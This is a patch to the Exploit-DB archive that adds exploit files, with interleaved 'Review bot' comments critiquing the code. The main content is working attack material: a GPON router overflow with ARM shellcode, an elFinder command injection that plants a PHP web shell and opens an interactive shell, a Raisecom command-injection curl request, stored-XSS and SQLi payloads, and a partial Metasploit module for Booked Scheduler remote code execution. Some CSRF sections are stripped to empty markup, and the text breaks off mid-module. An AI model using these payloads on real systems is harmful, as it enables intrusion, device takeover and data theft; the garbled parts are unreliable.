From a37e3008e52163a63b495948c8650b446a7876d9 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 5 Mar 2019 05:01:50 +0000 Subject: [PATCH] DB: 2019-03-05 20 changes to exploits/shellcodes Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1) STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2) symphony CMS 2.3 - Multiple Vulnerabilities Symphony CMS 2.3 - Multiple Vulnerabilities Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution zzzphp CMS 1.6.1 - Cross-Site Request Forgery Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload) Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) OOP CMS BLOG 1.0 - Multiple SQL Injection OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery CMSsite 1.0 - Multiple Cross-Site Request Forgery elFinder 2.1.47 - Command Injection vulnerability in the PHP connector MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal Bolt CMS 3.6.4 - Cross-Site Scripting Craft CMS 3.1.12 Pro - Cross-Site Scripting WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) Linux/x64 - Kill All Processes Shellcode (11 bytes) Linux/x86 - iptables -F Shellcode (43 bytes) --- exploits/hardware/dos/46469.py | 147 +++++++++ exploits/hardware/webapps/46489.txt | 19 ++ exploits/hardware/webapps/46498.txt | 41 +++ exploits/linux/dos/46484.txt | 56 ++++ exploits/php/webapps/46480.txt | 149 +++++++++ exploits/php/webapps/46481.py | 107 +++++++ exploits/php/webapps/46482.txt | 22 ++ exploits/php/webapps/46483.txt | 175 +++++++++++ exploits/php/webapps/46486.rb 
| 181 +++++++++++ exploits/php/webapps/46488.txt | 79 +++++ exploits/php/webapps/46495.txt | 30 ++ exploits/php/webapps/46496.txt | 31 ++ exploits/php/webapps/46497.txt | 65 ++++ exploits/windows/dos/46485.html | 184 ++++++++++++ exploits/windows/local/45496.c | 448 ++++++++++++++++++++++++++++ exploits/windows/webapps/46487.py | 150 ++++++++++ exploits/windows/webapps/46494.py | 69 +++++ files_exploits.csv | 23 +- files_shellcodes.csv | 3 + shellcodes/linux_x86-64/46492.c | 64 ++++ shellcodes/linux_x86/46491.c | 55 ++++ shellcodes/linux_x86/46493.c | 99 ++++++ 22 files changed, 2194 insertions(+), 3 deletions(-) create mode 100755 exploits/hardware/dos/46469.py create mode 100644 exploits/hardware/webapps/46489.txt create mode 100644 exploits/hardware/webapps/46498.txt create mode 100644 exploits/linux/dos/46484.txt create mode 100644 exploits/php/webapps/46480.txt create mode 100755 exploits/php/webapps/46481.py create mode 100644 exploits/php/webapps/46482.txt create mode 100644 exploits/php/webapps/46483.txt create mode 100755 exploits/php/webapps/46486.rb create mode 100644 exploits/php/webapps/46488.txt create mode 100644 exploits/php/webapps/46495.txt create mode 100644 exploits/php/webapps/46496.txt create mode 100644 exploits/php/webapps/46497.txt create mode 100644 exploits/windows/dos/46485.html create mode 100644 exploits/windows/local/45496.c create mode 100755 exploits/windows/webapps/46487.py create mode 100755 exploits/windows/webapps/46494.py create mode 100644 shellcodes/linux_x86-64/46492.c create mode 100644 shellcodes/linux_x86/46491.c create mode 100644 shellcodes/linux_x86/46493.c diff --git a/exploits/hardware/dos/46469.py b/exploits/hardware/dos/46469.py new file mode 100755 index 000000000..bdf2fa3d4 --- /dev/null +++ b/exploits/hardware/dos/46469.py 
@@ -0,0 +1,147 @@
+#!/usr/bin/python3
+
+
+import argparse
+import requests
+import urllib.parse
+import binascii
+import re
+
+
+def run(target):
+ """ Execute exploitation """
+ # We're using CVE-2018-10561 and/or it's extension in order to exploit this
+ # Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this
+ # issue after successful authentication: "useradmin" permission is enough
+ #
+ # IP Spoofing. Perspective option here too
+ #
+
+ # Step 1. Just a request to adjust stack for the exploit to work
+ #
+ # POST /GponForm/device_Form?script/ HTTP/1.1
+ # Host: 192.168.1.1
+ # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
+ # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ # Accept-Language: en-US,en;q=0.5
+ # Accept-Encoding: gzip, deflate
+ # Referer: http://192.168.1.1/device.html
+ # Content-Type: application/x-www-form-urlencoded
+ # Content-Length: 55
+ # Connection: close
+ # Upgrade-Insecure-Requests: 1
+ #
+ # XWebPageName=device&admin_action=usb_enable&usbenable=1
+
+ headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
+ 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+ 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
+ 'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded',
+ 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}
+ payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1}
+ try:
+ requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2)
+ except:
+ pass
+
+ # Step 2. 
Actual Exploitation + # + # POST /GponForm/usb_Form?script/ HTTP/1.1 + # Host: 192.168.1.1 + # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 + # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + # Accept-Language: en-US,en;q=0.5 + # Accept-Encoding: gzip, deflate + # Referer: http://192.168.1.1/usb.html + # Content-Type: application/x-www-form-urlencoded + # Content-Length: 639 + # Connection: close + # Upgrade-Insecure-Requests: 1 + + # XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1 + + # Weaponizing request: + + # mov r8, r8 ; NOP for ARM Thumb + + nop = "\xc0\x46" + + # .section .text + # .global _start + # + # _start: + # .code 32 + # add r3, pc, #1 + # bx r3 + # + # ; We've removed prev commands as processor is already in Thumb mode + # + # .code 16 + # add r0, pc, #8 + # eor r1, r1, r1 + # eor r2, r2, r2 + # strb r2, [r0, #10] ; Changing last char of command to \x00 in runtime + # mov r7, #11 + # svc #1 + # .ascii "/bin/tftpdX" + + shellcode = "\x02\xa0\x49\x40\x52\x40\x82\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x74\x66\x74\x70\x64\x58" + + # Overwritting only 3 bytes in order to get \x00 in 4th + + pc = 
"\xe1\x8c\x03" + + exploit = "A" + 197 * nop + shellcode + 26*"A" + pc + + payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous', + 'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'', + 'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'} + headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', + 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', + 'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded', + 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', + 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'} + # Prevent requests from URL encoding + payload_str = "&".join("%s=%s" % (k,v) for k,v in payload.items()) + try: + requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2) + except: + pass + + print("The payload has been sent. Please check UDP 69 port of router for the tftpd service"); + print("You can use something like: sudo nmap -sU -p 69 192.168.1.1"); + + +def main(): + """ Parse command line arguments and start exploit """ + + # + # Exploit should be executed after reboot. You can easily achive this in 3 ways: + # 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that + # 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from "device.html" page + # 3) Repeat this exploit at least twice ;) + # any of those will work! 
+ #
+
+ parser = argparse.ArgumentParser(
+ add_help=False,
+ formatter_class=argparse.RawDescriptionHelpFormatter,
+ epilog="Examples: %(prog)s -t http://192.168.1.1/")
+
+ # Adds arguments to help menu
+ parser.add_argument("-h", action="help", help="Print this help message then exit")
+ parser.add_argument("-t", dest="target", required="yes", help="Target URL address like: https://localhost:443/")
+
+ # Assigns the arguments to various variables
+ args = parser.parse_args()
+
+ run(args.target)
+
+
+#
+# Main
+#
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46489.txt b/exploits/hardware/webapps/46489.txt
new file mode 100644
index 000000000..6ed814092
--- /dev/null
+++ b/exploits/hardware/webapps/46489.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Remote code execution in Raisecom xpon
+# Date: 03/03/2019
+# Exploit Author: JameelNabbo
+# Website: Ordina.nl
+# Vendor Homepage: https://www.raisecom.com
+# Software Link: https://www.raisecom.com/products/xpon
+# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
+# Tested on: MacOSX
+# CVE-2019-7385
+
+POC:
+curl -i -s -k -X 'POST' \
+-H 'Origin: http://127.0.0.1' -H -H 'Content-Type:
+application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
+--data-binary
+$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
+\
+'http://192.168.1.1/boaform/formPasswordSetup'
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46498.txt b/exploits/hardware/webapps/46498.txt
new file mode 100644
index 000000000..24f6903a0
--- /dev/null
+++ b/exploits/hardware/webapps/46498.txt
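Review bot: Both `try` blocks in `run` end in a bare `except: pass`, which swallows every exception including `KeyboardInterrupt`, so a refused connection or a mistyped `-t` URL still ends with "The payload has been sent"; `except requests.RequestException: pass` keeps the intended best-effort send while letting real errors and Ctrl-C surface. In `main`, `required="yes"` only works because a non-empty string is truthy where argparse documents a boolean; `required=True`. `binascii` and `re` are imported but never referenced, and the two `print(...)` calls carry trailing semicolons. Unlike the other files in this commit the script has no `# Exploit Title:` / version header; one naming the affected model from the commit message would let readers tie the file to the advisory and to the CVE-2018-10561 bypass the first comment relies on.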
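Review bot: The curl command under `POC:` is not runnable as transcribed: `-H -H 'Content-Type: ...'` makes curl take the literal `-H` as a header value and the Content-Type string as a URL, and `--data-binary` is separated from its `$'...'` argument by a line break with no trailing `\`. `csrf_token=current_cCSRF_ToKEN` is a placeholder, which the text should say explicitly — the request needs a valid token and an authenticated session, which is the main limiting factor for this issue and should be stated for anyone assessing exposure. The backtick-wrapped `reboot` in `newpass`/`confpass` is the only hint at how the injection works; a one-line description of the affected handler (`/boaform/formPasswordSetup`) and the injected parameter would make the advisory usable for writing a detection rule.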
@@ -0,0 +1,41 @@
+# Exploit Title: Fiberhome AN5506-04-F - Stored Cross Site Scripting
+# Date: 04.03.2019
+# Exploit Author: Tauco
+# Vendor Homepage: http://www.fiberhomegroup.com/en/
+# Version: RP2669
+# Tested on: Windows 10
+# CVE : CVE-2019-9556
+
+Description:
+===========================================================================
+
+Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application.
+
+https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
+
+Proof of concept :
+
+===========================================================================
+1. Login with credential 192.168.1.1
+2. Go to Management
+3. Open User Account
+4. Add user
+5. Inject the post parameter "account_user"
+6. Encode Url
+
+POST /goform/setUser HTTP/1.1
+Host: 192.168.1.1
+Content-Length: 101
+Cache-Control: max-age=0
+Origin: http://192.168.1.1
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://192.168.1.1/management/account_admin.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: loginName=admin
+Connection: close
+
+account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new
\ No newline at end of file
diff --git a/exploits/linux/dos/46484.txt b/exploits/linux/dos/46484.txt
new file mode 100644
index 000000000..cd81db432
--- /dev/null
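Review bot: `Content-Length: 101` does not match the body that follows it — `account_user=` plus the 29-character URL-encoded script alone comes to 100 bytes, and the whole body to roughly 178 — so the request cannot be replayed verbatim from the advisory; either the header or the body was edited after capture. Step 1, `Login with credential 192.168.1.1`, reads as if the address were a credential; `Log in to the device at 192.168.1.1` is clearer. The description paragraph is generic OWASP text; a sentence saying where the stored `account_user` value is rendered unescaped (presumably the account list on `account_admin.asp`, given the Referer) would tell a defender which page to check and where output encoding belongs.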
+++ b/exploits/linux/dos/46484.txt 
@@ -0,0 +1,56 @@ +# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC) +# Discovery by: Mr Winst0n +# Discovery Date: February 20, 2019 +# Vendor Homepage: https://filezilla-project.org +# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1 +# Tested Version: 3.40.0 +# Tested on: Kali linux x86_64 +# Vulnerability Type: Denial of Service (DoS) + + +# Steps to Produce the Crash: +# 1.- Run python code : python filezilla.py +# 2.- Open buff.txt and copy content to clipboard +# 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively) +# 4.- In the opend window, Set Search type to "Local search" +# 5.- Paste ClipBoard on "Search directory" and click on "Search" +# 6.- Boom! Crashed... + + +#!/usr/bin/env python + +buffer = "\x41" * 384 +crash = "/" + buffer + "BBBB" + "CCCC" +f = open("buff.txt", "w") +f.write(crash) +f.close() + +# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path. + + +# Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC) +# Discovery by: Mr Winst0n +# Discovery Date: February 25, 2019 +# Vendor Homepage: https://filezilla-project.org +# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1 +# Tested Version: 3.40.0 +# Tested on: Kali linux x86_64 +# Vulnerability Type: Denial of Service (DoS) + + +# Steps to Produce the Crash: +# 1.- Run python code : python filezilla-2.py +# 2.- Open crash.txt and copy content to clipboard +# 3.- In "Local site" section paste clipboard and Enter. +# 4.- Boom! Crashed... + + +#!/usr/bin/env python + +buffer = "\x41" * 384 +crash = "/" + buffer + "BBBB" + "CCCC" +f = open("crash.txt", "w") +f.write(crash) +f.close() + +# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path. \ No newline at end of file 
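Review bot: The `#!/usr/bin/env python` line in each of the two scripts sits after roughly twenty comment lines, so it is not an interpreter directive; this is harmless because step 1 invokes `python filezilla.py` explicitly, but the file should either begin with the shebang or drop it. The `f = open(...)` / `f.write(crash)` / `f.close()` triple is better written `with open("buff.txt", "w") as f: f.write(crash)`, which closes the file even if the write raises; the same applies to the second script writing `crash.txt`. The two scripts differ only in the output filename, so a single script with one note covering both entry points ("Search directory" and "Local site") would be easier to keep consistent.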
diff --git a/exploits/php/webapps/46480.txt b/exploits/php/webapps/46480.txt new file mode 100644 index 000000000..299d1e8da --- /dev/null +++ b/exploits/php/webapps/46480.txt @@ -0,0 +1,149 @@ +# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + + Delete Admin + + +
+ +
+ + + + +# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + + Edit Admin + + +
+ + + +
+ + +

+ +
+ + +

+ +
+ + +

+ +
+ + +

+
+ + +

+ +
+ + +

+ +
+ + +

+
+ + + +
+ + + + +# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + Add Admin + + +
+ +
+ +

+
+ +
+ +

+
+ +
+ +

+
+ +
+ +

+
+
+

+
+
+ +

+ +
+
+ +

+
+ + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46481.py b/exploits/php/webapps/46481.py new file mode 100755 index 000000000..b351848ea --- /dev/null +++ b/exploits/php/webapps/46481.py 
@@ -0,0 +1,107 @@ +#!/usr/bin/python + +''' +# Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability in the PHP connector. +# Date: 26/02/2019 +# Exploit Author: @q3rv0 +# Vulnerability reported by: Thomas Chauchefoin +# Google Dork: intitle:"elFinder 2.1.x" +# Vendor Homepage: https://studio-42.github.io/elFinder/ +# Software Link: https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz +# Version: <= 2.1.47 +# Tested on: Linux 64bit + Python2.7 +# PoC: https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/ +# CVE: CVE-2019-9194 + +# Usage: python exploit.py [URL] + +''' + +import requests + +import json + +import sys + + +payload = 'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php;echo SecSignal.jpg' + + +def usage(): + + if len(sys.argv) != 2: + + print "Usage: python exploit.py [URL]" + + sys.exit(0) + + +def upload(url, payload): + + files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))} + + data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"} + + r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data) + + j = json.loads(r.text) + + return j['added'][0]['hash'] + + +def imgRotate(url, hash): + + r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960°ree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash)) + + return r.text + + +def shell(url): + + r = requests.get("%s/php/SecSignal.php" % url) + + if r.status_code == 200: + + print "[+] Pwned! :)" + + print "[+] Getting the shell..." 
+
+ while 1:
+
+ try:
+
+ input = raw_input("$ ")
+
+ r = requests.get("%s/php/SecSignal.php?c=%s" % (url, input))
+
+ print r.text
+
+ except KeyboardInterrupt:
+
+ sys.exit("\nBye kaker!")
+
+ else:
+
+ print "[*] The site seems not to be vulnerable :("
+
+
+def main():
+
+ usage()
+
+ url = sys.argv[1]
+
+ print "[*] Uploading the malicious image..."
+
+ hash = upload(url, payload)
+
+ print "[*] Running the payload..."
+
+ imgRotate(url, hash)
+
+ shell(url)
+
+
+if __name__ == "__main__":
+
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/46482.txt b/exploits/php/webapps/46482.txt
new file mode 100644
index 000000000..59368d0f9
--- /dev/null
+++ b/exploits/php/webapps/46482.txt
@@ -0,0 +1,22 @@
+# Exploit Title: OOP CMS BLOG 1.0 - SQL Injection
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan[@]gmail[.]com
+# Discovery Date: March 1, 2019
+# Vendor Homepage: http://zsoft.com.bd/
+# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
+# Tested Version: 1.0
+# Tested on: Kali linux, Windows 8.1
+
+
+# PoC:
+
+# Multiple files are vulnerable:
+
+# http://localhost/[PATH]/search.php?search=1 [SQLi]&submit=Search
+# http://localhost/[PATH]/post.php?id=17 [SQLi]
+# http://localhost/[PATH]/posts.php?id=4 [SQLi]
+# http://localhost/[PATH]/page.php?pageid=8 [SQLi]
+# http://localhost/[PATH]/admin/viewUser.php?userid=34 [SQLi]
+# http://localhost/[PATH]/admin/replayMsg.php?msgid=4 [SQLi]
+
+# Note: Above *id values are random.
\ No newline at end of file
diff --git a/exploits/php/webapps/46483.txt b/exploits/php/webapps/46483.txt
new file mode 100644
index 000000000..cfe8dd13d
--- /dev/null
+++ b/exploits/php/webapps/46483.txt
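Review bot: The query string built in `imgRotate` contains `height=960°ree=180`, a non-ASCII character that looks like an HTML-entity artefact (`&deg` rendered as `°`) picked up when the file was copied from a web page; if that is what the committed file holds rather than a rendering artefact of this view, the parameter name is wrong and should be checked against the author's original. `hash` in `upload`/`imgRotate`/`main` and `input` in `shell` shadow Python builtins, and `open('SecSignal.jpg', 'rb')` is never closed and depends on a `SecSignal.jpg` the script neither creates nor mentions in its usage text. `upload` indexes `j['added'][0]['hash']` without checking the response, so a failed upload surfaces as a `KeyError`/`IndexError` traceback rather than a message. The file is Python 2 only (`print` statements, `raw_input`), which the `Tested on` header states but the `Usage:` line does not; the enclosing `shell` function starts in the previous chunk line of this hunk.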
@@ -0,0 +1,175 @@ +# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Delete Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: http://zsoft.com.bd/ +# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + + + +
+ +
+ + + + +# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Update Site Title and Description) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: http://zsoft.com.bd/ +# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Post) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: http://zsoft.com.bd/ +# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + + + + +
+ + + +
+ + + +
+ + + +
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +
+ + + +
+ + + +
+ + + +
+ + + +
+ + + + +
+ + +
+ + + + +# Note: Many other sections are vulnerable to CSRF, too. +# For example: Delete Post, Add Slider, ... \ No newline at end of file diff --git a/exploits/php/webapps/46486.rb b/exploits/php/webapps/46486.rb new file mode 100755 index 000000000..a267f601b --- /dev/null +++ b/exploits/php/webapps/46486.rb 
@@ -0,0 +1,181 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Booked Scheduler v2.7.5 - Remote Command Execution', + 'Description' => %q{ + This module exploits a file upload vulnerability Booked 2.7.5. + In the "Look and Feel" section of the management panel, you can modify the Logo-Favico-CSS files. + Upload sections has file extension control except favicon part. + You can upload the file with the extension you want through the Favicon field. + The file you upload is written to the main directory of the site under the name "custom-favicon". + After upload the php payload to the main directory, Exploit executes payload and receives shell. + }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Booked Scheduler v2.7.5', {}] + ], + 'DisclosureDate' => '01 March 2019', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptBool.new('SSL', [true, 'Use SSL', false]), + OptString.new('TARGETURI', [true, 'The base path to Booked', '/']), + OptString.new('USER', [true, 'User to login with', 'admin']), + OptString.new('PASS', [true, 'Password to login with', 'admin']), + ], self.class) + end +## +# Check Exploit Vulnerable +## + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/Web/index.php") + }) + + if res and res.code == 200 and res.body =~ /v2.7.5/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + return res + end +## +# Exploit 
Portion +## + def exploit + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, "/Web/index.php"), + 'vars_post' => { + "email" => datastore['USER'], + "password" => datastore['PASS'], + "captcha" => "", + "resume" => "", + "language" => "en_us", + "login" => "submit" + + } + }) + + if res and res.code == 302 + print_status("Successful redirection to admin dashboard.") + else + return res + end + + get_cookie = res.get_cookies + cookie = get_cookie +## +# Login Access Control +## + control = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/Web/dashboard.php") + }) + + html = control.body + if html =~ /Dashboard/ + print_good("Login successfuly") + else + print_status("User information is incorrect. Login failed") + exit 0 + end +## +# Reading CSRF Token +## + csrf = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php") + }) + + html = control.body + if html =~ /Look and Feel/ + token = csrf.body.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1] + print_status("CSRF Token = #{token}") + else + print_status("User information is incorrect. 
